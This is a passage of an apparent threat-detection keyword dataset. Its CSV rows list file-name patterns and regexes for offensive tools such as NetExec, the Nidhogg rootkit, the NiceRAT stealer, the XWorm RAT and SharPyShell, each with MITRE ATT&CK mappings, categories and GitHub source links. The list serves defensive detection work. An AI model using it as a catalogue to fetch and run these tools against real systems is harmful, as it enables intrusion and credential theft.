pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_32_RunasCs.exe*",".{0,1000}\\net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_32SharpDoor.exe*",".{0,1000}\\net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_32sharpfiles.exe*",".{0,1000}\\net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_64_RunasCs.exe*",".{0,1000}\\net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_64SharpDoor.exe*",".{0,1000}\\net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_64sharpfiles.exe*",".{0,1000}\\net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_Any_RunasCs.exe*",".{0,1000}\\net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_AnySharpDoor.exe*",".{0,1000}\\net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_Anysharpfiles.exe*",".{0,1000}\\net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.7_32_RunasCs.exe*",".{0,1000}\\net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.7_64_RunasCs.exe*",".{0,1000}\\net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.7_Any_RunasCs.exe*",".{0,1000}\\net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_portscan.py*",".{0,1000}\\net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\NETAMSI.ps1*",".{0,1000}\\NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\NetClone.exe*",".{0,1000}\\NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\NetClone\Program.cs*",".{0,1000}\\NetClone\\Program\.cs.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\netcreds.py*",".{0,1000}\\netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\netexec.py*",".{0,1000}\\netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\netexec.yml*",".{0,1000}\\netexec\.yml.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NetExec-main*",".{0,1000}\\NetExec\-main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NetExec-main\*",".{0,1000}\\NetExec\-main\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\netkit\client\shell.py*",".{0,1000}\\netkit\\client\\shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*\netkit\src\netkit.*",".{0,1000}\\netkit\\src\\netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*\NetLoader.exe*",".{0,1000}\\NetLoader\.exe.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*\NetshHelperBeacon.cpp*",".{0,1000}\\NetshHelperBeacon\.cpp.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.dll*",".{0,1000}\\NetshHelperBeacon\.dll.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.lib*",".{0,1000}\\NetshHelperBeacon\.lib.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.log*",".{0,1000}\\NetshHelperBeacon\.log.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.pdb*",".{0,1000}\\NetshHelperBeacon\.pdb.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon\*",".{0,1000}\\NetshHelperBeacon\\.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\netshlep.cpp*",".{0,1000}\\netshlep\.cpp.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*\netview.x64.dll*",".{0,1000}\\netview\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\NewPhish.ps1*",".{0,1000}\\NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\nGenerated payload:*",".{0,1000}\\nGenerated\spayload\:.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*\Ngrok-Disk.dll*",".{0,1000}\\Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Ngrok-Install.dll*",".{0,1000}\\Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\NiceFile.ppam*",".{0,1000}\\NiceFile\.ppam.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\NiceRAT.py*",".{0,1000}\\NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*\NiceRAT-1.0.0.zip*",".{0,1000}\\NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*\NiceRAT-main\*",".{0,1000}\\NiceRAT\-main\\.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*\Nidhogg.cpp*",".{0,1000}\\Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\Nidhogg.exe*",".{0,1000}\\Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\Nidhogg.sln*",".{0,1000}\\Nidhogg\.sln.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\Nidhogg.sys*",".{0,1000}\\Nidhogg\.sys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\NidhoggClient.exe*",".{0,1000}\\NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\NidhoggClient\*",".{0,1000}\\NidhoggClient\\.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - 